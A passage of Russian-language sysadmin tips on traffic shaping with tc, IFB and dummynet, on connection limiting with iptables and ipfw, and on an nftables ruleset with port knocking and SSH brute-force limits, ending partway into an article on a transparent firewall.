Во FreeBSD 7 появилась возможность задания множественных таблиц маршрутизаций. В ядре отвечает за это опция: options ROUTETABLES=[количество таблиц] Распределения трафика будет осуществляться средствами пакетного фильтра ipfw. Задаем маршруты по умолчанию: setfib 0 route add default 1.0.1.1 # таблица по умолчанию setfib 1 route add default 1.1.1.1 # новая таблица Файл конфигурации для запуска ipfw: cmd="/sbin/ipfw" $cmd add 10 check-state $cmd add 20 prob 0.5 setfib 0 tcp from 192.168.0.0/16 to not 192.168.0.0/16 setup keep-state $cmd add 30 setfib 1 tcp from 192.168.0.0/16 to not 192.168.0.0/16 setup keep-state $cmd add 40 allow all from any to any Таким образом мы задаем распределение трафика 50/50. Если каналы не равноценные то нужно выставить процентную весомость этих каналов. Трансляция адресов (NAT). Под эту задачу я выбрал ipnat, реализацию NAT от фаервола ipf. пример /etc/ipnat.rules: map vlan0 192.168.0.0/16 -> 1.0.1.1/32 map tun0 192.168.0.0/16 -> 1.1.1.1/32 Также можно выбрать демон natd или новый, работающий на уровне ядра, NAT, который появился во FreeBSD 7.

Скрипт для распределения пропускной способности средствами iproute2 в Linux (доп. ссылка 1) Автор: Adam Palmer [комментарии]

Скрипт опробован в Debian Etch с установленными пакетами tc, iproute2 и bc. Задача скрипта равномерное распределения пропускной способности канала среди пользователей и повышения приоритета dns, ssh, smtp. SOME_IMPORTANT_IP, SOME_OTHER_IMPORTANT_IP, IMPORTANT_IP - нужно заменить на IP важного сервера во внутренней сети. #!/bin/bash EXT_IFACE="eth0" INT_IFACE="eth1" TC="tc" UNITS="kbit" LINE="10000" # максимальная фактическая скорость внешнего (ext) линка LIMIT="5000" # максимально скорость, которую мы можем допустить # Переменные определеяющие скорость для индивидуальных классов трафика # для ограничения внутреннего трафика, проходящего через интерфейс eth0; CLS1_RATE="200" # гарантировано 200kbit CLS2_RATE="300" # гарантировано 300kbit CLS3_RATE="4500" # на всех 4500kbit (низкий приоритет) # Переменные определеяющие скорость для индивидуальных классов трафика # для ограничения трафика, проходящего через внешний интерфейс eth1; INT_CLS1_RATE="1000" #Priority INT_CLS2_RATE="4000" #Bulk # Чистим содержимое qdiscs ${TC} qdisc del dev ${INT_IFACE} root ${TC} qdisc del dev ${EXT_IFACE} root # Создаем корневые qdiscs, используя HTB, привязываем к интерфейсу и ставим метку "1:0" ${TC} qdisc add dev ${INT_IFACE} root handle 1:0 htb ${TC} qdisc add dev ${EXT_IFACE} root handle 1:0 htb # Создаем корневые классы и выставляем максимально-допустимый лимит скорости # eth1 ${TC} class add dev ${INT_IFACE} parent 1:0 classid 1:1 htb rate ${LIMIT}${UNITS} ceil ${LIMIT}${UNITS} # eth0 ${TC} class add dev ${EXT_IFACE} parent 1:0 classid 1:1 htb rate ${LIMIT}${UNITS} ceil ${LIMIT}${UNITS} # Создаем дочерние классы, маркируем их меткой "1:2", "1:3", в зависимости от лимита, для eth1 ${TC} class add dev ${INT_IFACE} parent 1:1 classid 1:2 htb rate ${INT_CLS1_RATE}${UNITS} ceil ${LIMIT}${UNITS} ${TC} class add dev ${INT_IFACE} parent 1:1 classid 1:3 htb rate ${INT_CLS2_RATE}${UNITS} ceil ${INT_CLS2_RATE}${UNITS} # Привязываем лимит для eth1 (для ограничения исходящего трафика) # Ставим для класса "1:2" гарантированную скорость 200kbit # с возможностью подъема при свободности канала до 5000kbit ${TC} class add dev ${EXT_IFACE} parent 1:1 classid 1:2 htb rate ${CLS1_RATE}${UNITS} ceil ${LIMIT}${UNITS} # Ставим для класса "1:3" гарантированную скорость 300kbit # с возможностью подъема при свободности канала до 4800kbit (5000kbit - 200kbit зарезервированный для 1:2) ${TC} class add dev ${EXT_IFACE} parent 1:1 classid 1:3 htb rate \ ${CLS2_RATE}${UNITS} ceil `echo ${LIMIT}-${CLS1_RATE}|bc`${UNITS} # Ставим для менее приоритетного класса "1:4" оставшуюся скорость 4500kbit (5000kbit - 200kbit - 300kbit) ${TC} class add dev ${EXT_IFACE} parent 1:1 classid 1:4 htb rate ${CLS3_RATE}${UNITS} \ ceil `echo ${LIMIT}-${CLS1_RATE}-${CLS2_RATE}|bc`${UNITS} # Добавляем pfifo. ${TC} qdisc add dev ${INT_IFACE} parent 1:2 handle 12: pfifo limit 10 ${TC} qdisc add dev ${INT_IFACE} parent 1:3 handle 13: pfifo limit 10 ${TC} qdisc add dev ${EXT_IFACE} parent 1:2 handle 12: pfifo limit 10 ${TC} qdisc add dev ${EXT_IFACE} parent 1:3 handle 13: pfifo limit 10 ${TC} qdisc add dev ${EXT_IFACE} parent 1:4 handle 14: pfifo limit 10 ### С классами закончили, создаем правила для адресов в сети # INT_IFACE, настраиваем скорость. # под dst подразумевается трафик уходящий во внутренний интерфейс eth0, т.е. к локальному IP # и определяем скорость загрузки с этих адресов. # адрес SOME_IMPORTANT_IP привязываем к классу 1:2 ${TC} filter add dev ${INT_IFACE} parent 1:0 protocol ip prio 1 u32 match ip dst SOME_IMPORTANT_IP/32 flowid 1:2 ${TC} filter add dev ${INT_IFACE} parent 1:0 protocol ip prio 1 u32 match ip dst SOME_OTHER_IMPORTANT_IP/32 flowid 1:2 # Все остальные адреса привязываем к классу 1:3 и считаем неприоритетными ${TC} filter add dev ${INT_IFACE} parent 1:0 protocol ip prio 1 u32 match ip dst 0.0.0.0/0 flowid 1:3 # EXT_IFACE # Устанавливаем повышенный приоритет для DNS запросов ${TC} filter add dev ${EXT_IFACE} parent 1:0 protocol ip prio 1 u32 match ip src IMPORTANT_IP/32 match ip sport 53 0xffff flowid 1:2 # SSH тоже считаем приоритетным ${TC} filter add dev ${EXT_IFACE} parent 1:0 protocol ip prio 1 u32 match ip src IMPORTANT_IP/32 match ip sport 22 0xffff flowid 1:2 # SMTP отдаем остатки полосы, но приоритет по сравнению с остальным трафиком поднимаем ${TC} filter add dev ${EXT_IFACE} parent 1:0 protocol ip prio 1 u32 match ip src IMPORTANT_IP/32 match ip sport 25 0xffff flowid 1:3 # Все остальное - в последнюю очередь, самый низкий приоритет ${TC} filter add dev ${EXT_IFACE} parent 1:0 protocol ip prio 1 u32 match ip src 0.0.0.0/0 flowid 1:4

IFB (аналог IMQ ) - основные команды для управления трафиком Автор: Andrejs Spunitis [комментарии]

Считается что IFB идеологически более правильная реализация псевдо-устройства, чем IMQ. IFB по умолчанию доступна в дистре Fedora Core 6. IMQ требует патчить ядро, по умолчанию не доступна. Насколько я понял идеологически IFB - это скорее для iproute2 IMQ - iptables Документация по IFB в исходниках iproute doc/actions/ или по адресу: http://linux-net.osdl.org/index.php?title=IFB Отличные картинки с местоположением IMQ: http://www.abclinuxu.cz/clanky/site/traffic-shaping-2-imq-a-uvod-do-shapingu # СБРОС ПРАВИЛ ----------------------------- tc qdisc del dev eth0 root tc qdisc del dev eth0 ingress tc qdisc del dev ifb0 root tc qdisc del dev ifb0 ingress modprobe ifb ip link set dev ifb0 up service iptables restart # ------------------------------------------ # IFB включение ---------------------------- modprobe ifb ip link set dev ifb0 up # ------------------------------------------ ## ПОЛЕЗНЫЕ КОМАНДЫ------------------------- tc -s filter show parent ffff: dev eth0 tc -s qdisc ifconfig ifb0 tc -s filter show dev ifb0 parent 1: tc -s qdisc show dev ifb0 ###################################################### # ПРИМЕР ограничения входящего трафика # маркировка IPTABLES недоступна ###################################################### ### IFB -------------------------------------------------------------- tc qdisc add dev ifb0 root handle 1: prio tc qdisc add dev ifb0 parent 1:1 handle 10: tbf rate 80kbit buffer 1600 limit 3000 tc qdisc add dev ifb0 parent 1:2 handle 20: tbf rate 160kbit buffer 1600 limit 3000 ## выделили закачку исходников ядра ## wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.6.tar.gz tc filter add dev ifb0 parent 1: protocol ip prio 1 u32 match ip src 204.152.191.37/32 flowid 1:1 ## выделили закачку исходников fedora core 6 ## wget ftp://ftp.muug.mb.ca/pub/fedora/linux/core/6/i386/iso/FC-6-i386-DVD.iso tc filter add dev ifb0 parent 1: protocol ip prio 2 u32 match ip src 130.179.31.46/32 flowid 1:2 ### eth0 -------------------------------------------------------------- # перенаправлять входящие пакеты с eth0 в ifb0 tc qdisc add dev eth0 ingress tc filter add dev eth0 parent ffff: protocol ip \ u32 match u32 0 0 action mirred egress redirect dev ifb0 ## TESTING ------------------------------------------------------------- оцените скорость и т.д. wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.6.tar.gz ###################################################### # ПРИМЕР ограничения исходящего трафика # маркировка IPTABLES доступна но # filter работает на уровне iproute2 match ip dst ###################################################### Выполните СБРОС ПРАВИЛ и включите IFB (если выкл.) ### IFB -------------------------------------------------------------- tc qdisc add dev ifb0 root handle 1: prio tc qdisc add dev ifb0 parent 1:1 handle 10: tbf rate 80kbit buffer 1600 limit 3000 tc qdisc add dev ifb0 parent 1:2 handle 20: tbf rate 160kbit buffer 1600 limit 3000 # закачка большого файла с хх.хх.хх.хх tc filter add dev ifb0 parent 1: protocol ip prio 2 u32 match ip dst хх.хх.хх.хх/32 flowid 1:2 ### eth0 -------------------------------------------------------------- # перенаправлять выходящие пакеты с eth0 в ifb0 tc qdisc add dev eth0 root handle 2: prio tc filter add dev eth0 parent 2: protocol ip \ u32 match u32 0 0 action mirred egress redirect dev ifb0 ## TESTING ------------------------------------------------------------- закачивайте большой файла на хх.хх.хх.хх оцените скорость и т.д. tc -s filter show parent ffff: dev eth0 tc -s qdisc ifconfig ifb0 tc -s filter show dev ifb0 parent 1: tc -s qdisc show dev ifb0 ###################################################### # ПРИМЕР ограничения исходящего трафика # маркировка IPTABLES доступна # filter работает на уровне маркировке пакетов в IPTABLES ###################################################### Выполните СБРОС ПРАВИЛ и включите IFB (если выкл.) ### IFB -------------------------------------------------------------- tc qdisc add dev ifb0 root handle 1: prio tc qdisc add dev ifb0 parent 1:1 handle 10: tbf rate 80kbit buffer 1600 limit 3000 tc qdisc add dev ifb0 parent 1:2 handle 20: tbf rate 160kbit buffer 1600 limit 3000 tc filter add dev ifb0 parent 1:0 prio 0 protocol ip handle 10 fw flowid 1:1 tc filter add dev ifb0 parent 1:0 prio 0 protocol ip handle 20 fw flowid 1:2 ### eth0 -------------------------------------------------------------- # перенаправлять выходящие пакеты с eth0 в ifb0 tc qdisc add dev eth0 root handle 2: prio tc filter add dev eth0 parent 2: protocol ip \ u32 match u32 0 0 action mirred egress redirect dev ifb0 tc qdisc add dev eth0 root handle 2: prio tc filter add dev eth0 parent 2: protocol ip \ u32 match u32 0 0 action mirred egress redirect dev ifb0 # поставить в IPTABLES метку iptables -t mangle -A OUTPUT -p tcp -d 85.254.228.6/32 -j MARK --set-mark 10 ## TESTING ------------------------------------------------------------- закачивайте большой файла на хх.хх.хх.хх оцените скорость и т.д.

Расчет размера очереди для pipe с заданной пропускной способностью (доп. ссылка 1) [комментарии]

> Работает шейпер на dummynet, наблюдается некотороая потеря > траффика. Hавскидку проблема в дефолтных значениях размера очереди (50 пакетов) > для pipe'ов от 32 до 512 Кбит\с. Скорее всего, поток не влезает в очередь и > часть пакетов отбрасывается. Как правильно рассчитать размер очереди для > каждого pipe в отдельности? Eugene Grosbein: Pipe и должен отбрасывать пакеты, иначе какой же это шейпер? Ты не можешь увеличивать длину очереди бесконечно, потому что задержки вырастут настолько, что соединение начнет рвать сам юзер :-) Hа таких низких скоростях размер очереди надо бы, наоборот, уменьшать, чтобы не допустить гигантских задержек типа нескольких тысяч милисекунд. А если хочешь и рыбку съесть, и потерь иметь минимум, то читай-ка ты про RED/GRED на unixfaq.ru и делай не просто pipe, а queue/pipe с gred. Рекомендую делать w_q=0.002, max_p=0.1, min=q/10, max=3*min, где q - длина очереди, q=20 для скоростей меньше 100Kbit/s, q=30 для скоростей от 100 до 300Kbit/s и q=50 для скоростей 512Kbit/s и выше. ---------- Sergey A Yakovets: Пол-дня игрался с параметром queue. В итоге подобрал на первый взгляд кое-что подходящее. Алгоритм\мысли были следующие: Дано: асинхронный спутниковый Инет. Входящий канал - 1024 Кбит\с. Опытным путем установлено, что проблемы с потерей траффика (до 10% от общего объема) возникают при многопотоковых http\ftp закачках, т.к. спутниковый провайдер в этом случае может отдать поток на все 1024 Кбит\с. При серфинге все нормально. Исходя из этого, мною были сделаны некоторые расчеты: При максимальной пропускной способности входящего спутникового канала в 1024 Кбит\с и размере пакета в 1500 байт, пропускная способность канала равна ~ 87 пакетов\сек. В это же время, для канала в 128 Кбит\с пропускная способность равна ~ 11 пакетов\сек. Гипотетическая разница, при условии что на юзера будет идти поток в 1024 Кбит\с, а отдаваться только 128 Кбит\с, может составить 76 пакетов\сек. Итого, опытным путем установлено: - (было) при дефолтной очереди в 50 пакетов на pipe 128 Кбит\с потери 10% - при размере очереди = разница*2 = 150 пакетов потери 2% - (стало) при размере очереди = разница*3 = 230 пакетов потери 0% Серфинг не страдает, задержек нет. Закачка идет на скорости шейпера, потерь нет. Пробовал другой вариант. Hа pipe 128 Кбит\с было выставлено gred 0.002/3/6/0.1 В итоге - огромные потери, т.к. канал практически все время работал на скорости пакетов намного больше чем max_th*2. Изменение параметров до gred 0.002/50/150/0.1 не влияло на результат, т.к. дефолтный размер очереди в 50 пакетов часто переполнялся и gred не имел никакого действия. --------- Что такое алгоритмы RED и gentle RED у ipfw? http://unixfaq.ru/index.pl?req=qs&id=310 Ответ на этот вопрос скомпилирован из статей в конференции RU.UNIX.BSD от следующих авторов: Valentin Ermolaev, Alexander V. Naumochkin, Jen Linkova. Сокращение RED означает "Random Early Detection". Метод используется для выравнивания всплесков трафика. Основным критерием метода является так называемая перегрузка. В качестве показателя перегрузки avg используется вычисляемое среднее значение длины очереди пакетов, принадлежащей к определенной сессии TCP. Использование усредненного, а не мгновенного значения очереди позволяет отделить кратковременные перегрузки, которые могут быть нормально обработаны устройством и сетью, от длительных перегрузок, которые могут утопить сеть. Алгоритмически это выглядит так: В момент прихода пакета ; ; if (очередь не пуста) ; ; ; ; avg = (1 - w_q)*avg + w_q*q ; ; else ; ; ; ; m = f(time - q_time) ; ; ; ; avg = (1 - w_q)^m * avg; где avg -средний размер очереди q_time - "start of queue idle time" q - размер очереди w_q - вес очереди (фиксированный параметр) f() - линейная функий от времени В /usr/src/sys/netinet/ip_dummynet.c по этому поводу написано следующее: * RED algorithm * * RED calculates the average queue size (avg) using a low-pass filter * with an exponential weighted (w_q) moving average: * avg <- (1-w_q) * avg + w_q * q_size * where q_size is the queue length (measured in bytes or * packets). * * If q_size == 0, we compute the idle time for the link, and set * avg = (1 - w_q)^(idle/s) * where s is the time needed for transmitting a medium-sized packet. - что полностью согласуется с приведенными выше формулами. Далее в алгоритме вводятся два порога уровня перегрузки: min_th и max_th. Когда уровень перегрузки ниже первого порога min_th, то пакеты не отбрасываются. Если уровень перегрузки находится между двумя порогами, пакеты отбрасываются с линейно возврастающей вероятностью из диапазона от 0 до конфигурируемой величины max_p, которая достигается при достижении второго порога max_th. Выше порога max_th отбрасываются все пакеты. Такой метод вычисления позволяет сглаживать всплески трафика - для сравнения в первой из статей (см. ниже) на одном графике приводятся и изменение размера очереди q, и усредненного размера очереди (avg) от времени. В той же статье есть выкладки на тему значений w_q. При gentle RED ситуация выглядит чуть сложнее: Если перегрузки лежит в интервале от min_th до max_th, то пакеты отбрасываются с линейно возрастающей от 0 до max_p вероятностью. Когда перегрузка превышает max_th, но не превышет 2*max_th, пакеты отбрасываются не все (как в случае RED), а с линейно возрастающей от max_p до 1 вероятностью. Все пакеты отбрасываются только после превышения перегрузки канала значения 2*max_th. Вот как это сделано в ip_dummynet.c: если длина очереди > max_th, то в случае gred вероятность отбрасывания пакета вычисляется как ; ; p_b = c_3 * avg - c_4 где c_3 = (1 - max_p) / max_th ; ; c_4 = 1 - 2 * max_p В случае просто RED пакет отбрасывается. При загрузке очереди, большей min_th, но меньшей max_th, функция вероятности одинакова и выглядит след. образом: ; ; p_b = c_1 *avg - c_2 где c_1 = max_p / (max_th - min_th), ; ; c_2 = max_p * min_th / (max_th - min_th) Полезные ссылки: 1. http://www.icir.org/floyd/papers/red/red.html 2. http://www.icir.org/floyd/red.html 3. http://www.cisco.com/warp/public/732/Tech/red/

Ограничение входящей и исходящей скорости (shaping) для клиентов на ppp интерфейсах. Автор: Tangar aka Андрей Орлов [комментарии]

Ограничение входящей и исходящей скорости (shaping) для клиентов на ppp интерфейсах. #!/bin/bash DEVICE=ppp9 UP=512 DOWN=512 /sbin/tc qdisc del dev $DEVICE root /sbin/tc qdisc add dev $DEVICE root tbf rate ${DOWN}Kbit latency 50ms burst $[$DOWN*1024] /sbin/tc qdisc del dev $DEVICE handle ffff: ingress /sbin/tc qdisc add dev $DEVICE handle ffff: ingress /sbin/tc filter add dev $DEVICE parent ffff: protocol ip prio 50 u32 match ip src 0.0.0.0/0 \ police rate ${UP}Kbit burst $[$DOWN*1024] drop flowid :1

Ограничение трафика через iptables (доп. ссылка 1) Автор: Николай Малых [комментарии]

ipt_limit - общее ограничение по срабатываний правила -m limit --limit {avg}/[second|minute|hour|day] --limit-burst {burst} iplimit - ограничение соединений для одного IP. Ограничение коннектов к 80 порту от одного IP: iptables -A INPUT -p tcp --syn --dport http -m iplimit --iplimit-above 4 -j REJECT Тоже, но для запросов с одной /24 подсети: iptables -A INPUT -p tcp --syn --dport http -m iplimit --iplimit-mask 8 --iplimit-above 4 -j REJECT hashlimit - для каждого IP в хэше хранятся параметры соединений; -m hashlimit --hashlimit {avg} --hashlimit-burst {burst} --hashlimit-mode {режим: dstip, dstport, srcip, srcport} \ --hashlimit-name {name} --hashlimit-htable-max {num} --hashlimit-htable-expire {num} --hashlimit-htable-gcinterval {num} iptables -A INPUT -p tcp -m tcp --dport 22 -m state --state NEW -m hashlimit --hashlimit 1/hour \ --hashlimit-burst 2 --hashlimit-mode srcip --hashlimit-name SSH --hashlimit-htable-expire 360000 -j ACCEPT tbf (http://www.nmalykh.org/work/tbf.tar.gz) - продолжение развития limit и hashlimit c поддержкой возможности инверсии правил в целом. iptables -A INPUT -p tcp -m tcp --dport 22 -m state --state NEW -m tbf ! -- tbf 1/s --tbf-burst --tbf-mode srcip --tbf-name SMTP -j DROP

Как ограничить пропускную полосу для пакетов помеченных меткой через MARK. Автор: Denis Fedorishenko (NuclearCat) [комментарии]

Сделать MARK, и загнать все такие трансферы в какой-либо класс шейпера. Т.е. если например помеченные пакеты - все их отнести к классу 1:51 где скорость ограничена от 32К до 64К: tc filter add dev eth1 parent 1:0 protocol ip prio 100 handle 51 fw classid 1:51 tc class add dev eth1 parent 1:2 classid 1:51 htb rate 32Kbit ceil 64Kbit tc qdisc add dev eth1 parent 1:51 handle 51 sfq perturb 10

Ограничения трафика с помощью iproute2 (доп. ссылка 1) Автор: Z0termaNN [комментарии]

tc qdisc add dev eth1 root handle 1: htb default 2 r2q 1 tc class add dev eth1 parent 1: classid 1:1 htb rate 10mbit ceil 10mbit mtu 1500 tc class add dev eth1 parent 1:1 classid 1:77 htb rate 32kbit ceil 48kbit mtu 1500 prio 0 tc class add dev eth1 parent 1:1 classid 1:2 htb rate 128kbit ceil 128kbit mtu 1500 tc filter add dev eth1 protocol ip parent 1:0 prio 1 u32 match ip dport 25 flowid 1:77

Пример ограничения полосы пропускания трафика в FreeBSD [комментарии]

Собираем ядро с опциями: options DUMMYNET options IPFIREWALL Ограничиваем трафик для сеток 1.1.1.0/24 и 3.3.3.0/24 на 14000 кбит/с: ipfw add pipe 50 tcp from any to 1.1.1.0/24 via fxp0 ipfw add pipe 50 tcp from any to 3.3.3.0/24 via fxp0 ipfw pipe 50 config bw 14Kbit/s Для внесения задержки на N ms, используйте delay N после config. Для установки веса данного пайпа по отношению к другим пайпам используйте weight вес. Для WF2Q ограничения трафика используйте ipfw queue (queue N config [pipe pipe_nr] [weight weight] [queue {slots | size}) PS (комментарий от gara@mail.ru): Если возникает необходимость организовать "канал" для каждого пользователя из данной сети то пишем: ipfw pipe 10 config mask dst-ip 0x000000ff bw 1024bit/s queue ipfw add pipe 10 tcp from any to 1.1.1.0/24 via fxp0 Теперь каждый хост из сети 1.1.1.0/24 имеет свой канал 1024bit/s

Как запретить открывать более 30 соединений с одного IP [комментарии]

Запретим более 30 коннектов для 80 порта сервера 1.2.3.4. ipfw add allow tcp from any to 1.2.3.4 80 limit src-addr 30 ipfw add allow tcp from any to 1.2.3.4 80 via fxp0 setup limit src-addr 10 Вместо src-addr можно использовать src-port, dst-addr, dst-port Конструкция работает в последних версиях FreeBSD 4.x ветки.

Ограничение трафика через iptables (доп. ссылка 1) Автор: Z0termaNN [комментарии]

iptables --new-chain car iptables --insert OUTPUT 1 -p tcp --destination-port 25 -o eth1 --jump car iptables --append car -m limit --limit 20/sec --jump RETURN iptables --append car --jump DROP

Пакетные фильтры и фаерволы

Пакетные фильтры в Linux: iptables, ipchains

Пакетный фильтр в FreeBSD: ipfw, IP-Filter

Пакетные фильтры в Linux: iptables, ipchains

Пример правил nftables с реализацией port knoсking для открытия доступа к SSH Автор: umask [комментарии]

Общий набор правил для nftables с реализацией техники "port knoсking", позволяющей организовать временное открытие сетевого порта к SSH только после предварительной попытки соединения к определённой последовательности портов (порты задаются в параметрах "define ssh_port_knock_[1234]"). #!/usr/bin/env -S bash -c 'nft -cof "${0}" && nft -f "${0}"' flush ruleset table inet filter { define sshd_port = 2299; set ssh_bad_ipv4_set { type ipv4_addr; flags dynamic; timeout 15m; } set ssh_bad_ipv6_set { type ipv6_addr; flags dynamic; timeout 15m; } set ssh_clients_ipv4_set { type ipv4_addr; flags dynamic; timeout 3s; } set ssh_clients_ipv6_set { type ipv6_addr; flags dynamic; timeout 3s; } set ssh_clients_candidates_ipv4_set { type ipv4_addr . inet_service; flags dynamic; timeout 1s; } set ssh_clients_candidates_ipv6_set { type ipv6_addr . inet_service; flags dynamic; timeout 1s; } ### printf %d\\n 0x$(openssl rand -hex 2) define ssh_port_knock_1 = changeme1; define ssh_port_knock_2 = changeme2; define ssh_port_knock_3 = changeme3; define ssh_port_knock_4 = changeme4; ### opened ports set serving_tcp_ports_set { type inet_service; flags constant; # elements = { # http, # https, # }; } set trusted_ipv4_set { type ipv4_addr; flags constant, interval; elements = { 169.254.169.254, 10.0.0.0/8, 192.168.0.0/16, }; } set trusted_ipv6_set { type ipv6_addr; flags constant, interval; elements = { fd00:ec2::254, }; } define dns_resolvers = { 0.0.0.0/0, } define allowed_icmp_types_input = { echo-reply, echo-request, destination-unreachable, } define allowed_icmp_types_output = { echo-reply, echo-request, destination-unreachable, } ### rfc4890; assist mobility candidate codes: 144, 145, 146, 147 define allowed_icmpv6_types_input = { echo-reply, echo-request, destination-unreachable, packet-too-big, time-exceeded, parameter-problem, nd-router-solicit, nd-router-advert, nd-neighbor-solicit, nd-neighbor-advert, ind-neighbor-solicit, ind-neighbor-advert, mld-listener-query, mld-listener-report, mld-listener-done, mld2-listener-report, } ### rfc4890; assist mobility candidate codes: 144, 145, 146, 147 define allowed_icmpv6_types_output = { echo-reply, echo-request, destination-unreachable, packet-too-big, time-exceeded, parameter-problem, nd-router-solicit, nd-router-advert, nd-neighbor-solicit, nd-neighbor-advert, ind-neighbor-solicit, ind-neighbor-advert, mld-listener-query, mld-listener-report, mld-listener-done, mld2-listener-report, } chain INPUT { type filter hook input priority filter + 20; policy drop; iif lo accept comment "accept input connections via loopback"; iif != lo ip saddr 127.0.0.0/8 counter drop comment "drop loopback connections not coming from loopback"; iif != lo ip daddr 127.0.0.0/8 counter drop comment "drop loopback connections not coming from loopback"; iif != lo ip6 saddr ::1/128 counter drop comment "drop loopback connections not coming from loopback"; iif != lo ip6 daddr ::1/128 counter drop comment "drop loopback connections not coming from loopback"; ### as little rules as possible for trusted hosts ip saddr @trusted_ipv4_set accept comment "accept trusted hosts"; ip6 saddr @trusted_ipv6_set accept comment "accept trusted hosts"; ### before ct meta l4proto icmp icmp type $allowed_icmp_types_input limit rate 10/second burst 20 packets counter accept comment "accept icmp with limits"; meta l4proto icmpv6 icmpv6 type $allowed_icmpv6_types_input limit rate 10/second burst 20 packets counter accept comment "accept icmpv6 with limits"; meta l4proto { icmp, icmpv6 } counter drop comment "drop icmp over limit"; ct state vmap { established : accept, related : accept, invalid : drop }; tcp dport @serving_tcp_ports_set ct state new counter accept comment "accept connections to serving tcp ports"; ### port knocking #tcp dport $ssh_port_knock_1 add @ssh_clients_candidates_ipv4_set { ip saddr . $ssh_port_knock_2 }; #tcp dport $ssh_port_knock_1 add @ssh_clients_candidates_ipv6_set { ip6 saddr . $ssh_port_knock_2 }; #tcp dport $ssh_port_knock_2 ip saddr . tcp dport @ssh_clients_candidates_ipv4_set add @ssh_clients_candidates_ipv4_set { ip saddr . $ssh_port_knock_3 }; #tcp dport $ssh_port_knock_2 ip6 saddr . tcp dport @ssh_clients_candidates_ipv6_set add @ssh_clients_candidates_ipv6_set { ip6 saddr . $ssh_port_knock_3 }; #tcp dport $ssh_port_knock_3 ip saddr . tcp dport @ssh_clients_candidates_ipv4_set add @ssh_clients_candidates_ipv4_set { ip saddr . $ssh_port_knock_4 }; #tcp dport $ssh_port_knock_3 ip6 saddr . tcp dport @ssh_clients_candidates_ipv6_set add @ssh_clients_candidates_ipv6_set { ip6 saddr . $ssh_port_knock_4 }; #tcp dport $ssh_port_knock_4 ip saddr . tcp dport @ssh_clients_candidates_ipv4_set add @ssh_clients_ipv4_set { ip saddr } counter log prefix "ssh port knocked : "; #tcp dport $ssh_port_knock_4 ip6 saddr . tcp dport @ssh_clients_candidates_ipv6_set add @ssh_clients_ipv6_set { ip6 saddr } counter log prefix "ssh port knocked : "; #tcp dport $sshd_port ip saddr @ssh_clients_ipv4_set counter accept; #tcp dport $sshd_port ip6 saddr @ssh_clients_ipv6_set counter accept; ### rate limits tcp dport $sshd_port ct state new, untracked meter ssh_conns_ratemeter4 { ip saddr timeout 5m limit rate over 1/minute burst 7 packets } counter update @ssh_bad_ipv4_set { ip saddr } comment "update ssh bruteforce set with saddr of attacker; hint: nft list meter inet filter ssh_conns_ratemeter4"; tcp dport $sshd_port ct state new, untracked meter ssh_conns_ratemeter6 { ip6 saddr timeout 5m limit rate over 1/minute burst 7 packets } counter update @ssh_bad_ipv6_set { ip6 saddr } comment "update ssh bruteforce set with saddr of attacker; hint: nft list meter inet filter ssh_conns_ratemeter6"; tcp dport $sshd_port ip saddr @ssh_bad_ipv4_set counter drop comment "drop ssh bruteforce; hint: nft list set inet filter ssh_bad_ipv4_set"; tcp dport $sshd_port ip6 saddr @ssh_bad_ipv6_set counter drop comment "drop ssh bruteforce; hint: nft list set inet filter ssh_bad_ipv6_set"; tcp dport $sshd_port counter accept comment "accept ssh connections"; ### new rules place here: counter comment "count dropped packets"; #log prefix "nft drop IN : " comment "log dropped packets"; } chain OUTPUT { type filter hook output priority filter + 20; policy drop; oif lo accept comment "accept input connections via loopback"; oif != lo ip saddr 127.0.0.0/8 counter drop comment "drop loopback connections not coming from loopback"; oif != lo ip daddr 127.0.0.0/8 counter drop comment "drop loopback connections not coming from loopback"; oif != lo ip6 saddr ::1/128 counter drop comment "drop loopback connections not coming from loopback"; oif != lo ip6 daddr ::1/128 counter drop comment "drop loopback connections not coming from loopback"; ### as little rules as possible for trusted hosts ip daddr @trusted_ipv4_set accept comment "accept trusted hosts"; ip6 daddr @trusted_ipv6_set accept comment "accept trusted hosts"; ### before ct meta l4proto icmp icmp type $allowed_icmp_types_output limit rate 10/second burst 20 packets counter accept comment "accept icmp with limits"; meta l4proto icmpv6 icmpv6 type $allowed_icmpv6_types_output limit rate 10/second burst 20 packets counter accept comment "accept icmpv6 with limits"; meta l4proto { icmp, icmpv6 } counter drop comment "drop icmp over limit"; ct state vmap { established : accept, related : accept, invalid : drop }; meta skuid { root, uadm, chrony } meta skgid { root, uadm, chrony } counter accept comment "accept connections from specified users"; meta skuid postfix meta skgid postfix tcp dport { smtp, smtps, submission } counter accept comment "accept connections from postfix user"; meta l4proto { tcp, udp } th dport 53 ip daddr $dns_resolvers counter accept comment "accept dns; for paranoia specify comma separated list of resolvers in $dns_resolvers"; ### new rules place here: counter comment "count dropped packets"; log prefix "nft drop OUT : " comment "log dropped packets"; } chain FORWARD { type filter hook forward priority filter + 20; policy drop; log prefix "nft drop FWD : " comment "log dropped packets"; } }

Прозрачный межсетевой экран с маршрутизатором (доп. ссылка 1) Автор: Владимир Олейник [комментарии]

Предисловие В этом году поменяли провайдера. Выдал он нам небольшую сетку, сказал маршрутизатор по умолчанию, находящийся в этой же сети. В общем, ситуация вполне стандартная. Сразу же столкнулись с неудобствами такого подключения, которых не было при подключении к старому провайдеру по pppoe, ведь теперь маршрутизатор не под нашим управлением:
Все хосты с "белыми" адресами должны обзавестись собственными межсетевыми экранами.
Маршрутизация превращается либо в динамическую (что то ещё удовольствие), либо в прописывании её на всех "белых" хостах. Быстрые и неправильные решения Данные проблемы можно попытаться решить наскоком, и что может ложно успокоить, "всё будет работать". Поменяв маршрут по умолчанию на белых хостах на собственный маршрутизатор создастся видимость, что всё починилось: маршрутизация до филиалов и серых сетей появилась, а межсетевой экран даже сможет срабатывать на выход. Но кому более всего нужен межсетевой экран на выход? Вот то-то же. Да и с маршрутизацией не всё на самом деле в порядке. На каждый посланный вами из белой сети в Интернет пакет, вы будете получать ICMP redirect, говорящий, что маршрутизатор вами установлен не тот: PING branch.mydomain.ru (branch-IP): 56 data bytes From GW-IP Redirect (change route) 84 bytes from branch-IP: icmp_seq=0 ttl=63 time=N ms Windows машины, у которых по умолчанию применяется политика реагирования на этот код, будут бесконечно добавлять в таблицу маршрутизации записи на каждый хост в Интернете через маршрутизатор провайдера. Хорошо, а давайте добавим все статические маршруты, а между провайдерским и своим коммутатором поставим прозрачный файервол. Ну что ж, это решение будет работать пока вам не надоест возиться с маршрутизацией и не возникнет мысль, что может сделаем управляющий интерфейс прозрачного файервола в белой 